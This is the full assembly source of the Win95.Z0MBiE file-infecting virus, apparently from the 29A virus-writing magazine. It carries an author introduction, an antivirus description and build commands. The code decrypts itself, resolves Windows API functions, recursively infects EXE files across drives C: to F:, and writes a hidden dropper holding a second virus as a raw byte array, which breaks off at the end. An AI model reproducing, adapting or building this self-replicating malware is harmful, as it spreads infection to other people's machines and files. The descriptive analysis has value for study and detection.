;
;                           ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;                           ³    Win95.Z0MBiE    ³
;                           ³  v1.01, by Z0MBiE  ³
;                           ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
;
; This is the first collaboration of the russian virus writer Z0MBiE to 29A,
; and also his first Win95 PE infector. It is an encrypted runtime PE infec-
; tor which, after having decrypted  its body, locates KERNEL32.DLL and then
; looks in its export table for the address of the API functions used it the
; viral code. This virus  has also the feature which consists on looking for
; files to infect in the Windows directory as well as in other units. PE in-
; fection consists on adding a new section (called .Z0MBiE) to infected exe-
; cutables and  creating an entry point  in it  for the virus code. Last but
; not least, Win95.Z0MBiE, after having infected files in a given drive, in-
; serts a dropper  called ZSetUp.EXE in the root directory. This file is ac-
; tually a dropper of the Z0MBiE.1922 virus, also  included in this issue of
; 29A, in the "Viruses" section of  the magazine. Its peculiarities are des-
; cribed there, together with the analysis of Igor Daniloff, same as the one
; which follows, describing the behavior of Win95.ZOMBiE.
;
;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
; Win95.Zombie
;
; Igor Daniloff
; DialogueScience
;
; Win95.Zombie is a nondestructive nonresident encrypted virus which
; infects PortableExecutable EXE files. On starting an infected file,
; the virus decryptor explodes the main virus body and passes control
; to it. The main virus body determines the location of KERNEL32 Export
; Table in memory and saves in its code the address of WIN32 KERNEL API
; functions that are essential for infecting files.
;
; Then the virus determines the command line of the currently-loaded
; infected program and loads it once again through the WinExec function.
; The second virus copy then infects the system.  The first virus copy
; (that started a second copy the infected program), after completing
; the WinExec procedure, returns control to the host program.
;
; To infect PE EXE files, the virus scans the Windows system folder and
; also takes peeps into all other folders in drives C:, D:, E:, and F:.
; On detecting a PE EXE file, the virus analyzes the file. If all is well,
; the file is infected. Win95.Zombie creates a new segment section .Z0MBiE
; in the PE header, sets an entry point to it, and appends a copy of the
; encrypted code at the file end which is within the limits of the region
; of this segment section.  After infecting the logical drive, the virus
; creates a dropper file ZSetUp.EXE in the root directory and assigns it
; ARCHIVE and SYSTEM attributes. In this file, Win95.Zombie plants a
; Zombie.1922 virus code. The virus contains a few text strings:
;
;    Z0MBiE 1.01 (c) 1997
;    My 2nd virii for mustdie
;    Tnx to S.S.R.
;
;    Z0MBiE`1668 v1.00 (c) 1997 Z0MBiE
;    Tnx to S.S.R.
;    ShadowRAM/Virtual Process Infector
;    ShadowRAM Technology (c) 1996,97 Z0MBiE
;
;    code................1398
;    viriisize...........4584
;    virtsize............8936
;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
;
;
; Compiling it
; ÄÄÄÄÄÄÄÄÄÄÄÄ
; tasm32 -ml -m5 -q -zn zombie.asm
; tlink32 -Tpe -c -x -aa zombie.obj,,, import32.lib
; pewrsec zombie.exe
;
; - -[ZOMBIE.ASM] - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8

                        .386
                        locals
                        jumps
                        .model  flat

extrn                   ExitProcess:PROC
extrn                   MessageBoxA:PROC

kernel                  equ     0BFF70000H

FILE_ID                 equ     'Z0'
PORT_ID                 equ     'Z'

                        .data

sux                     db      'mustdie'

                        .code
start:
                        call    codestart

                        lea     ebp, [eax - 401000H]
                        lea     edx, codestart[ebp]
cryptn                  equ     (viriisize-decrsize+3) / 4
                        mov     ecx, cryptn
@@1:                    neg     dword ptr [edx]
                        xor     dword ptr [edx], 12345678h
xorword                 equ     dword ptr $-4
                        sub     edx, -4
                        loop    @@1
                        jmp     codestart

                        align   4
decrsize                equ     $-start

codestart:              lea     ebp, [eax - 401000H]
                        sub     eax, 12345678h
subme                   equ     dword ptr $-4
                        push    eax

                        call    analizekernel

                        call    first

                        in      al, 81h
                        cmp     al, PORT_ID
                        je      exit_to_program

                        in      al, 80h
                        cmp     al, PORT_ID
                        je      infect

                        mov     al, PORT_ID
                        out     80h, al

                        call    ExecExe

exit_to_program:        ret

infect:                 mov     al, -1
                        out     80h, al

                      ; call    _GetModuleHandleA
                      ; push    9
                      ; push    eax
                      ; call    _SetPriorityClass

                        ; infect windows directory

                        lea     edx, infdir[ebp]
                        call    getwindir
                        lea     edx, infdir[ebp]
                        call    setdir
                        call    infectdir

                        ; recursive infect

                        lea     edx, drive_c[ebp]
                        call    recinfect1st
                        call    createsetup

                        lea     edx, drive_d[ebp]
                        call    recinfect1st
                        call    createsetup

                        lea     edx, drive_e[ebp]
                        call    recinfect1st
                        call    createsetup

                        lea     edx, drive_f[ebp]
                        call    recinfect1st
                        call    createsetup

                        mov     al, PORT_ID
                        out     81h, al

exit_to_mustdie:        push    -1
                        call    _ExitProcess

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ subprograms ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

createsetup:            lea     edx, zsetup[ebp]
                        call    createfile

                        lea     edx, z[ebp]
                        mov     ecx, z_size
                        call    writefile

                        call    closefile

                        ret

first:                  pop     edi
                        mov     byte ptr [edi-5], 0b9h  ; mov ecx, xxxxxxxx
                        mov     byte ptr start[ebp], 0b9h

                        call    infectfile
                        jmp     exit_to_mustdie

ExecExe:                call    _GetCommandLineA
SW_NORMAL               equ     1
                        push    SW_NORMAL
                        push    eax
                        call    _WinExec
                        ret

recinfect1st:           call    setdir

recinfect:              call    infectdir

                        lea     eax, win32_data_thang[ebp]
                        push    eax
                        lea     eax, dirfiles[ebp]
                        push    eax
                        call    _FindFirstFileA
                        mov     edi, eax
                        inc     eax
                        jz      @@nomorefiles

@@processfile:          lea     eax, fileattr[ebp]
                        mov     al, [eax]
                        cmp     al, 10h         ; directory ?
                        jne     @@findnext

                        lea     edx, fullname[ebp]
                        cmp     byte ptr [edx], '.'
                        je      @@findnext
                        call    setdir

                        push    edi
                        lea     edx, fullname[ebp]
                        call    recinfect
                        pop     edi

                        lea     edx, prev_dir[ebp]
                        call    setdir

@@findnext:             lea     eax, win32_data_thang[ebp]
                        push    eax
                        push    edi
                        call    _FindNextFileA

                        or      eax, eax
                        jnz     @@processfile

@@nomorefiles:          ret

nokerneldll:
nofunction:
exit:                   jmp     $

analizekernel:          mov     esi, kernel
@@1:                  ; cmp     esi, kernel + 040000h
                      ; ja      nokernelfunc
                        lea     edi, kernel_sign[ebp]
                        mov     ecx, kernel_sign_size
                        rep     cmpsb
                        jne     @@1

kernelfound:            sub     esi, kernel_sign_size
                        mov     kernel_call[ebp], esi

                        mov     esi, kernel
                        lodsw
                        cmp     ax, 'ZM'
                        jne     nokerneldll

                        add     esi, 003Ch-2
                        lodsd

                        lea     esi, [esi + eax - 3ch - 4]
                        lodsd
                        cmp     eax, 'EP'
                        jne     nokerneldll

                        add     esi, 78h-4      ; esi=.edata

                        lodsd
                        add     eax, kernel + 10h
                        xchg    esi, eax

                        lodsd
                        lodsd
                        lodsd
                        mov     funcnum[ebp], eax

                        lodsd
                        add     eax, kernel
                        mov     entrypointptr[ebp], eax

                        lodsd
                        add     eax, kernel
                        mov     nameptr[ebp], eax

                        lodsd
                        add     eax, kernel
                        mov     ordinalptr[ebp], eax

                        lea     edx, names[ebp]
                        lea     edi, fns[ebp]

@@1:                    push    edi
                        call    findfunction
                        pop     edi

                        inc     edi             ; 68
                        stosd
                        add     edi, 6          ; jmp kernel_call[ebp]

                        mov     edx, esi

                        cmp     byte ptr [esi], 0
                        jne     @@1

                        ret

findfunction:           mov     ecx, 12345678h
funcnum                 equ     dword ptr $-4
                        xor     ebx, ebx

findnextfunc:           mov     esi, edx

                        mov     edi, [ebx + 12345678h]
nameptr                 equ     dword ptr $-4
                        add     edi, kernel

@@2:                    cmpsb
                        jne     @@1

                        cmp     byte ptr [esi-1], 0
                        jne     @@2

                        ; found

                        shr     ebx, 1
                        movzx   eax, word ptr [ebx + 12345678h]
ordinalptr              equ     dword ptr $-4
                        shl     eax, 2
                        mov     eax, [eax + 12345678h]
entrypointptr           equ     dword ptr $-4
                        add     eax, kernel

                        ret

@@1:                    add     ebx, 4
                        loop    findnextfunc

                        jmp     nofunction


infectdir:              lea     eax, win32_data_thang[ebp]
                        push    eax
                        lea     eax, exefiles[ebp]
                        push    eax
                        call    _FindFirstFileA

                        mov     searchhandle[ebp], eax
                        inc     eax
                        jz      @@exit

@@next:                 call    infectfile

                        lea     eax, win32_data_thang[ebp]
                        push    eax
                        push    12345678h
searchhandle            equ     dword ptr $-4
                        call    _FindNextFileA

                        or      eax, eax
                        jnz     @@next

@@exit:                 ret

                        ; input: ECX=file attr
                        ;        EDX=file
                        ; output: EAX=handle

openfile:               push    0
                        push    ecx
                        push    3 ; OPEN_EXISTING
                        push    0
                        push    0
                        push    80000000h + 40000000h
                        push    edx
                        call    _CreateFileA
                        mov     handle[ebp], eax
                        ret

                        ; input:  EDX=file
                        ; output: EAX=handle

createfile:             push    0
                        push    ecx
                        push    1 ; CREATE
                        push    0
                        push    0
                        push    80000000h + 40000000h
                        push    edx
                        call    _CreateFileA
                        mov     handle[ebp], eax
                        ret

seekfile:               push    0
                        push    0
                        push    edx
                        push    handle[ebp]
                        call    _SetFilePointer
                        ret

closefile:              push    handle[ebp]
                        call    _CloseHandle
                        ret

                        ; input: ECX=bytes to read
                        ;        EDX=buf

readfile:               push    0
                        lea     eax, bytesread[ebp]
                        push    eax
                        push    ecx
                        push    edx
                        push    handle[ebp]
                        call    _ReadFile
                        ret

                        ; input: ECX=bytes to read
                        ;        EDX=buf

writefile:              push    0
                        lea     eax, bytesread[ebp]
                        push    eax
                        push    ecx
                        push    edx
                        push    handle[ebp]
                        call    _WriteFile
                        ret

                        ; input: EDX=offset directory (256 byte)

getdir:                 cld
                        push    edx
                        push    255
                        call    _GetCurrentDirectoryA
                        ret

                        ; input: EDX=directory

setdir:                 push    edx
                        call    _SetCurrentDirectoryA
                        ret

getwindir:              cld
                        push    255
                        push    edx
                        call    _GetWindowsDirectoryA
                        ret

infectfile:             in      al, 82h
                        cmp     al, PORT_ID
                        jne     @@continue

                        lea     eax, fullname[ebp]
                        cmp     dword ptr [eax], 'BM0Z'
                        jne     @@exit

@@continue:             mov     ecx, fileattr[ebp]
                        lea     edx, fullname[ebp]
                        call    openfile

                        inc     eax
                        jz      @@exit

; goto the dword that stores the location of the pe header

                        mov     edx, 3Ch
                        call    seekfile

; read in the location of the pe header

                        mov     ecx, 4
                        lea     edx, peheaderoffset[ebp]
                        call    readfile

; goto the pe header
                        mov     edx, peheaderoffset[ebp]
                        call    seekfile

; read in enuff to calculate the full size of the pe header and object table

                        mov     ecx, 256
                        lea     edx, peheader[ebp]
                        call    readfile

; make sure it is a pe header and is not already infected
                        cmp     dword ptr peheader[ebp],'EP'
                        jne     @@close
                        cmp     word ptr peheader[ebp] + 4ch, FILE_ID
                        je      @@close
                        cmp     dword ptr peheader[ebp] + 52, 00400000h
                        jne     @@close

; go back to the start of the pe header
                        mov     edx, peheaderoffset[ebp]
                        call    seekfile

; read in the whole pe header and object table
                        lea     edx, peheader[ebp]
                        mov     ecx, headersize[ebp]
                        cmp     ecx, maxbufsize
                        ja      @@close
                        call    readfile

                        mov     word ptr peheader[ebp] + 4ch, FILE_ID

; locate offset of object table
                        xor     eax, eax
                        mov     ax, NtHeaderSize[ebp]
                        add     eax, 18h
                        mov     objecttableoffset[ebp],eax

; calculate the offset of the last (null) object in the object table
                        mov     esi, objecttableoffset[ebp]
                        lea     eax, peheader[ebp]
                        add     esi, eax
                        xor     eax, eax
                        mov     ax, numObj[ebp]
                        mov     ecx, 40
                        xor     edx, edx
                        mul     ecx
                        add     esi, eax

                        inc     numObj[ebp]    ; inc the number of objects

                        lea     edi, newobject[ebp]
                        xchg    edi,esi

; calculate the Relative Virtual Address (RVA) of the new object

                        mov     eax, [edi-5*8+8]
                        add     eax, [edi-5*8+12]
                        mov     ecx, objalign[ebp]
                        xor     edx,edx
                        div     ecx
                        inc     eax
                        mul     ecx
                        mov     RVA[ebp], eax

; calculate the physical size of the new object
                        mov     ecx, filealign[ebp]
                        mov     eax, viriisize
                        xor     edx, edx
                        div     ecx
                        inc     eax
                        mul     ecx
                        mov     physicalsize[ebp],eax

; calculate the virtual size of the new object
                        mov     ecx, objalign[ebp]
                        mov     eax, virtsize
                        xor     edx,edx
                        div     ecx
                        inc     eax
                        mul     ecx
                        mov     virtualsize[ebp],eax

; calculate the physical offset of the new object
                        mov     eax,[edi-5*8+20]
                        add     eax,[edi-5*8+16]
                        mov     ecx, filealign[ebp]
                        xor     edx,edx
                        div     ecx
                        inc     eax
                        mul     ecx
                        mov     physicaloffset[ebp],eax

; update the image size (the size in memory) of the file
                        mov     eax, virtsize
                        add     eax, imagesize[ebp]
                        mov     ecx, objalign[ebp]
                        xor     edx, edx
                        div     ecx
                        inc     eax
                        mul     ecx
                        mov     imagesize[ebp],eax

; copy the new object into the object table
                        mov    ecx, 40/4
                        rep    movsd

; calculate the entrypoint RVA
                        mov    eax, RVA[ebp]

                        mov    ebx, entrypointRVA[ebp]
                        mov    entrypointRVA[ebp], eax

                        sub     eax, ebx

; Set the value needed to return to the host
                        mov     subme[ebp], eax

; go back to the start of the pe header
                        mov     edx, peheaderoffset[ebp]
                        call    seekfile

; write the pe header and object table to the file
                        mov     ecx, headersize[ebp]
                        lea     edx, peheader[ebp]
                        call    writefile

; move to the physical offset of the new object
                        mov     edx, physicaloffset[ebp]
                        call    seekfile

; write the virus code to the new object

                        call    random
                        mov     xorword[ebp], eax

                        lea     edx, start[ebp]
                        mov     ecx, decrsize
                        call    writefile

                        lea     esi, codestart[ebp]
                        lea     edi, buf[ebp]
                        mov     ecx, cryptn
@@1:                    lodsd
                        xor     eax, xorword[ebp]
                        neg     eax
                        stosd
                        loop    @@1

                        lea     edx, buf[ebp]
                        mov     ecx, viriisize-decrsize
                        call    writefile

@@close:                call    closefile

@@exit:                 ret

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 32-bit random number generator ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

                        ; output: eax=rnd
                        ;         zf=rnd(2)

random:                 call    random16bit
                        shl     eax, 16

random16bit:            push    ebx
                        mov     bx, 1234h
rndword                 equ     word ptr $-2
                        in      al, 40h
                        xor     bl, al
                        in      al, 40h
                        add     bh, al
                        in      al, 41h
                        sub     bl, al
                        in      al, 41h
                        xor     bh, al
                        in      al, 42h
                        add     bl, al
                        in      al, 42h
                        sub     bh, al
                        mov     rndword[ebp], bx
                        xchg    bx, ax
                        pop     ebx
                        test    al, 1
                        ret

                        ; input:  eax
                        ; output: eax=rnd(eax)
                        ;         zf=rnd(2)

rnd:                    push    ebx
                        push    edx
                        xchg    ebx, eax
                        call    random
                        xor     edx, edx
                        div     ebx
                        xchg    edx, eax
                        pop     edx
                        pop     ebx
                        test    al, 1
                        ret


codesize                equ     $-start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ data area ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

kernel_sign:            pushfd                  ; <- kernel
                        cld
                        push    eax
                        push    ebx
                        push    edx
kernel_sign_size        equ     $-kernel_sign

kernel_call             dd      ?

names:                  db      'ExitProcess',0
                        db      'FindFirstFileA',0
                        db      'FindNextFileA',0
                        db      'CreateFileA',0
                        db      'SetFilePointer',0
                        db      'ReadFile',0
                        db      'WriteFile',0
                        db      'CloseHandle',0
                        db      'GetCurrentDirectoryA',0
                        db      'SetCurrentDirectoryA',0
                        db      'GetWindowsDirectoryA',0
                        db      'GetCommandLineA',0
                        db      'WinExec',0
                        db      'SetPriorityClass',0
                        db      'GetModuleHandleA',0
                        db      0

fns:
def_fn                  macro   name
_&name&:                db      68h
fn_&name&               dd      ?
                        jmp     kernel_call[ebp]
                        endm

def_fn                  ExitProcess
def_fn                  FindFirstFileA
def_fn                  FindNextFileA
def_fn                  CreateFileA
def_fn                  SetFilePointer
def_fn                  ReadFile
def_fn                  WriteFile
def_fn                  CloseHandle
def_fn                  GetCurrentDirectoryA
def_fn                  SetCurrentDirectoryA
def_fn                  GetWindowsDirectoryA
def_fn                  GetCommandLineA
def_fn                  WinExec
def_fn                  SetPriorityClass
def_fn                  GetModuleHandleA

bytesread               dd      ?

drive_c                 db      'C:\',0
drive_d                 db      'D:\',0
drive_e                 db      'E:\',0
drive_f                 db      'F:\',0

exefiles                db      '*.EXE',0
dirfiles                db      '*.',0

prev_dir                db      '..',0

win32_data_thang:
fileattr                dd      0
createtime              dd      0,0
lastaccesstime          dd      0,0
lastwritetime           dd      0,0
filesize                dd      0,0
resv                    dd      0,0
fullname                db      'Z0MB.EXE',256-8 dup (0)
realname                db      256 dup (0)

handle                  dd      ?

peheaderoffset          dd      ?
objecttableoffset       dd      ?

newobject:                      ;1234567  8
oname                   db      '.Z0MBiE',0
virtualsize             dd      0
RVA                     dd      0
physicalsize            dd      0
physicaloffset          dd      0
reserved                dd      0,0,0
objectflags             db      40h,0,0,0c0h

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ messages ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

                        db 13,10,'Z0MBiE 1.01 (c) 1997',13,10
                        db 'My 2nd virii for mustdie',13,10
                        db 'Tnx to S.S.R.',13,10

m1                      macro   n
                        if      n ge 100000
                        db      n / 10000/10 mod 10 + '0'
                        else
                        db      '.'
                        endif
                        if      n ge 10000
                        db      n /  10000 mod 10 + '0'
                        else
                        db      '.'
                        endif
                        if      n ge 1000
                        db      n /   1000 mod 10 + '0'
                        else
                        db      '.'
                        endif
                        db      n /    100 mod 10 + '0'
                        db      n /     10 mod 10 + '0'
                        db      n /      1 mod 10 + '0',13,10
                        endm

; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
zsetup                  db      '\ZSetUp.EXE',0
z:
include                 z.inc                   ; Z0MBiE.1922
z_size                  equ     $-z
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

                        db      13,10
                        db      'code..............'
m1                      codesize
                        db      'viriisize.........'
m1                      viriisize
                        db      'virtsize..........'
m1                      virtsize

peheader:
signature               dd      0
cputype                 dw      0
numObj                  dw      0
                        dd      3 dup (0)
NtHeaderSize            dw      0
Flags                   dw      0
                        dd      4 dup (0)
entrypointRVA           dd      0
                        dd      3 dup (0)
objalign                dd      0
filealign               dd      0
                        dd      4 dup (0)
imagesize               dd      0
headersize              dd      0
peheader_size           equ     $-peheader

                        align   4
viriisize               equ     $-start

infdir                  db      256 dup (?)

maxbufsize              equ     4096
buf                     db      maxbufsize dup (?)

virtsize                equ     $-start
                        end     start

; - -[Z.INC]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8

abc_size                equ     1922                ; size in bytes
abc_num                 equ     1922                ; size in elements

abc db 0e9h,010h,001h,026h,0a0h,028h,000h,0f6h,0d0h,02eh,030h,006h,022h,001h
db 0beh,02bh,001h,08bh,0feh,0b9h,008h,000h,02eh,0ach,040h,0d1h,0e3h,00bh,0d8h
db 0e2h,0f7h,02eh,088h,01dh,047h,081h,0ffh,0adh,008h,075h,0eah,0ebh,000h,0e8h
db 056h,006h,0b8h,081h,0f0h,0cdh,013h,03dh,08ch,092h,074h,003h,0e8h,0d8h,000h
db 08ch,0c1h,083h,0c1h,010h,0b8h,034h,012h,003h,0c1h,08eh,0d0h,0bch,034h,012h
db 0b8h,034h,012h,003h,0c1h,050h,068h,034h,012h,033h,0c0h,0cbh,053h,0bbh,034h
db 012h,0e4h,040h,032h,0d8h,0e4h,040h,002h,0f8h,0e4h,041h,02ah,0d8h,0e4h,041h
db 032h,0f8h,0e4h,042h,002h,0d8h,0e4h,042h,02ah,0f8h,02eh,089h,01eh,058h,001h
db 093h,05bh,0a8h,001h,0c3h,053h,052h,093h,0e8h,0d4h,0ffh,033h,0d2h,0f7h,0f3h
db 092h,05ah,05bh,0a8h,001h,0c3h,051h,0b1h,059h,0e8h,04eh,000h,02eh,088h,02eh
db 0afh,001h,041h,0e8h,045h,000h,02eh,088h,02eh,0b5h,001h,041h,0e8h,03ch,000h
db 02eh,088h,02eh,0bbh,001h,059h,0c3h,090h,051h,0b9h,059h,000h,0e8h,03ah,000h
db 041h,0b5h,012h,0e8h,034h,000h,041h,0b5h,012h,0e8h,02eh,000h,059h,0c3h,051h
db 0b1h,059h,02eh,08ah,02eh,0afh,001h,080h,0e5h,08fh,080h,0cdh,030h,0e8h,01bh
db 000h,041h,0b5h,033h,0e8h,015h,000h,041h,0b5h,033h,0e8h,00fh,000h,059h,0c3h
db 066h,050h,052h,0e8h,014h,000h,0ech,08ah,0e8h,05ah,066h,058h,0c3h,066h,050h
db 052h,0e8h,007h,000h,08ah,0c5h,0eeh,05ah,066h,058h,0c3h,066h,0b8h,000h,000h
db 000h,080h,08ah,0c1h,024h,0fch,0bah,0f8h,00ch,066h,0efh,080h,0c2h,004h,08ah
db 0c1h,024h,003h,002h,0d0h,0c3h,01eh,006h,00eh,01fh,0fah,0fch,0e8h,070h,0ffh
db 0a0h,0afh,001h,0feh,0c0h,074h,058h,0e8h,0b8h,000h,075h,053h,0e8h,053h,000h
db 074h,00bh,0e8h,074h,000h,074h,006h,0e8h,07ch,000h,074h,001h,0c3h,0e8h,086h
db 0ffh,0b8h,042h,000h,0e8h,03bh,0ffh,003h,0e8h,083h,0c5h,00fh,083h,0e5h,0f0h
db 0c1h,0edh,004h,08ch,0c0h,003h,0c5h,02dh,010h,000h,08eh,0c0h,0bfh,000h,001h
db 0c6h,006h,082h,008h,0eah,0c7h,006h,083h,008h,017h,003h,08ch,006h,085h,008h
db 08ch,006h,0b6h,005h,0beh,000h,001h,0b9h,007h,008h,0f3h,0a4h,0e8h,035h,003h
db 0e8h,032h,0ffh,033h,0c0h,007h,01fh,0c3h,068h,000h,0c0h,007h,033h,0ffh,032h
db 0d2h,026h,08ah,075h,002h,0d1h,0e2h,073h,002h,0b6h,080h,081h,0eah,069h,008h
db 033h,0c0h,08bh,0efh,0b9h,025h,004h,0f3h,0afh,074h,004h,03bh,0fah,076h,0f3h
db 0c3h,0b8h,030h,011h,0b7h,002h,0cdh,010h,08ch,0c0h,03dh,000h,0c0h,0c3h,068h
db 000h,0c0h,007h,033h,0ffh,0b9h,00eh,000h,032h,0c0h,0f3h,0aeh,075h,015h,0b9h
db 010h,000h,0f3h,0aeh,026h,081h,07dh,0ffh,07eh,081h,075h,008h,026h,081h,07dh
db 00dh,07eh,0ffh,074h,006h,081h,0ffh,000h,0f0h,076h,0dch,08bh,0efh,0c3h,0b4h
db 013h,0cdh,02fh,08ch,0c1h,02eh,089h,01eh,02bh,003h,02eh,08ch,006h,02dh,003h
db 0cdh,02fh,081h,0f9h,000h,0f0h,0c3h,03dh,081h,0f0h,074h,019h,03dh,000h,04bh
db 074h,00fh,080h,0fch,043h,074h,00ah,080h,0fch,03dh,074h,005h,0eah,000h,000h
db 000h,000h,0e8h,048h,000h,0ebh,0f6h,0b8h,08ch,092h,0cfh,03dh,081h,0f0h,074h
db 0f7h,0e8h,0a2h,0feh,0e8h,089h,002h,02eh,0a3h,05ch,005h,0e8h,082h,0feh,09ch
db 09ah,000h,000h,000h,000h,09ch,0e8h,08eh,0feh,02eh,080h,03eh,05dh,005h,002h
db 075h,00dh,026h,081h,03fh,04dh,05ah,075h,003h,0e8h,0e4h,001h,0e8h,012h,002h
db 0e8h,060h,002h,0e8h,05dh,0feh,09dh,0cah,002h,000h,09ch,02eh,0ffh,01eh,00ah
db 003h,0c3h,0e8h,065h,0feh,02eh,0c6h,006h,0abh,001h,0c3h,060h,01eh,006h,0fch
db 0b8h,000h,03dh,0e8h,0e6h,0ffh,00fh,082h,066h,001h,093h,0b4h,03fh,00eh,01fh
db 0bah,087h,008h,0b9h,040h,000h,0e8h,0d4h,0ffh,03bh,0c1h,00fh,085h,04dh,001h
db 0a1h,087h,008h,03dh,04dh,05ah,074h,007h,03dh,05ah,04dh,00fh,085h,03eh,001h
db 080h,03eh,099h,008h,069h,00fh,084h,035h,001h,0b8h,000h,042h,033h,0c9h,08bh
db 016h,08fh,008h,0c1h,0e2h,004h,0e8h,0a7h,0ffh,0b4h,03fh,0bah,0bdh,003h,0b9h
db 002h,000h,0e8h,09ch,0ffh,03bh,0c1h,00fh,085h,015h,001h,0b8h,034h,012h,040h
db 00fh,084h,00dh,001h,053h,0b8h,020h,012h,0cdh,02fh,026h,08ah,01dh,0b8h,016h
db 012h,0cdh,02fh,05bh,026h,08bh,055h,013h,026h,08bh,045h,011h,00ah,0c0h,00fh
db 084h,0f5h,000h,0b9h,0e8h,003h,0f7h,0f1h,00bh,0d2h,00fh,084h,0eah,000h,026h
db 0c7h,045h,002h,002h,000h,00eh,007h,0a1h,08bh,008h,048h,0b9h,000h,002h,0f7h
db 0e1h,003h,006h,089h,008h,083h,0d2h,000h,08bh,0f0h,08bh,0fah,0b8h,002h,042h
db 099h,033h,0c9h,0e8h,041h,0ffh,03bh,0c6h,00fh,085h,0bah,000h,03bh,0d7h,00fh
db 085h,0b4h,000h,005h,00fh,000h,083h,0d2h,000h,024h,0f0h,02bh,0f0h,029h,036h
db 089h,008h,050h,052h,0c1h,0e8h,004h,0c1h,0e2h,00ch,00bh,0c2h,02bh,006h,08fh
db 008h,02dh,010h,000h,08bh,0c8h,087h,00eh,09dh,008h,089h,00eh,04bh,001h,0b9h
db 003h,001h,087h,00eh,09bh,008h,089h,00eh,051h,001h,08bh,0c8h,087h,00eh,095h
db 008h,089h,00eh,041h,001h,0b9h,010h,00ah,087h,00eh,097h,008h,089h,00eh,048h
db 001h,081h,006h,091h,008h,0a1h,000h,083h,006h,08bh,008h,01eh,083h,006h,089h
db 008h,03bh,0c6h,006h,099h,008h,069h,0b8h,000h,042h,059h,05ah,0e8h,0cfh,0feh
db 0e8h,05dh,000h,0b4h,040h,0bah,000h,001h,0b9h,02bh,000h,0e8h,0c1h,0feh,0beh
db 02bh,001h,0bfh,0c7h,008h,0b9h,008h,000h,0ach,092h,0bdh,008h,000h,033h,0c0h
db 0d0h,0e2h,0d1h,0d0h,048h,0aah,04dh,075h,0f5h,0e2h,0eeh,0b4h,040h,0bah,0c7h
db 008h,0b9h,040h,000h,0e8h,09bh,0feh,081h,0feh,0adh,008h,072h,0d7h,0b8h,000h
db 042h,099h,033h,0c9h,0e8h,08ch,0feh,0b4h,040h,0bah,087h,008h,0b9h,040h,000h
db 0e8h,081h,0feh,0b4h,03eh,0e8h,07ch,0feh,007h,01fh,061h,02eh,0c6h,006h,0abh
db 001h,090h,0e8h,0c9h,0fch,0c3h,0bfh,084h,007h,0b0h,0c3h,0aah,0b9h,0fdh,000h
db 033h,0c0h,0f3h,0aah,0c7h,006h,007h,001h,0f6h,0d0h,0b0h,008h,0e6h,070h,0e4h
db 071h,03ch,00ah,075h,028h,0c7h,006h,007h,001h,0b0h,000h,0b8h,009h,000h,0e8h
db 070h,0fch,096h,06bh,0f6h,012h,081h,0c6h,0e2h,006h,0b9h,002h,000h,0adh,097h
db 081h,0c7h,084h,007h,0a4h,0adh,097h,081h,0c7h,084h,007h,066h,0a5h,0e2h,0efh
db 0c3h,060h,01eh,006h,033h,0f6h,08eh,0deh,0c4h,09ch,084h,000h,00bh,0dbh,074h
db 01eh,0b8h,081h,0f0h,0cdh,021h,03dh,08ch,092h,074h,014h,02eh,089h,01eh,00ah
db 003h,02eh,08ch,006h,00ch,003h,0c7h,084h,084h,000h,0f5h,002h,08ch,08ch,086h
db 000h,007h,01fh,061h,0c3h,060h,0bah,034h,012h,032h,0f6h,0c1h,0e2h,004h,08dh
db 07fh,00ch,0b9h,00ah,000h,032h,0c0h,0fch,0f3h,0aeh,075h,033h,0bdh,053h,006h
db 0b9h,00bh,000h,08bh,0f5h,08bh,0fbh,02eh,0ach,03ch,0b0h,074h,004h,03ch,080h
db 073h,005h,026h,038h,005h,075h,011h,047h,0e2h,0eeh,08bh,0fbh,0b0h,0e5h,0aah
db 033h,0c0h,0b9h,01fh,000h,0f3h,0aah,0ebh,009h,083h,0c5h,00bh,081h,0fdh,0e2h
db 006h,075h,0d0h,083h,0c3h,020h,04ah,075h,0bah,061h,0c3h,050h,056h,057h,01eh
db 006h,02eh,0c5h,036h,02bh,003h,068h,034h,012h,007h,0bfh,082h,008h,08ah,004h
db 026h,086h,005h,088h,004h,046h,047h,081h,0ffh,087h,008h,075h,0f1h,007h,01fh
db 05fh,05eh,058h,0c3h,00dh,00ah,00ah,05ah,030h,04dh,042h,069h,045h,060h,031h
db 036h,036h,038h,020h,076h,031h,02eh,030h,030h,020h,028h,063h,029h,020h,031h
db 039h,039h,037h,020h,05ah,030h,04dh,042h,069h,045h,00dh,00ah,054h,06eh,078h
db 020h,074h,06fh,020h,053h,02eh,053h,02eh,052h,02eh,00dh,00ah,053h,068h,061h
db 064h,06fh,077h,052h,041h,04dh,02fh,056h,069h,072h,074h,075h,061h,06ch,020h
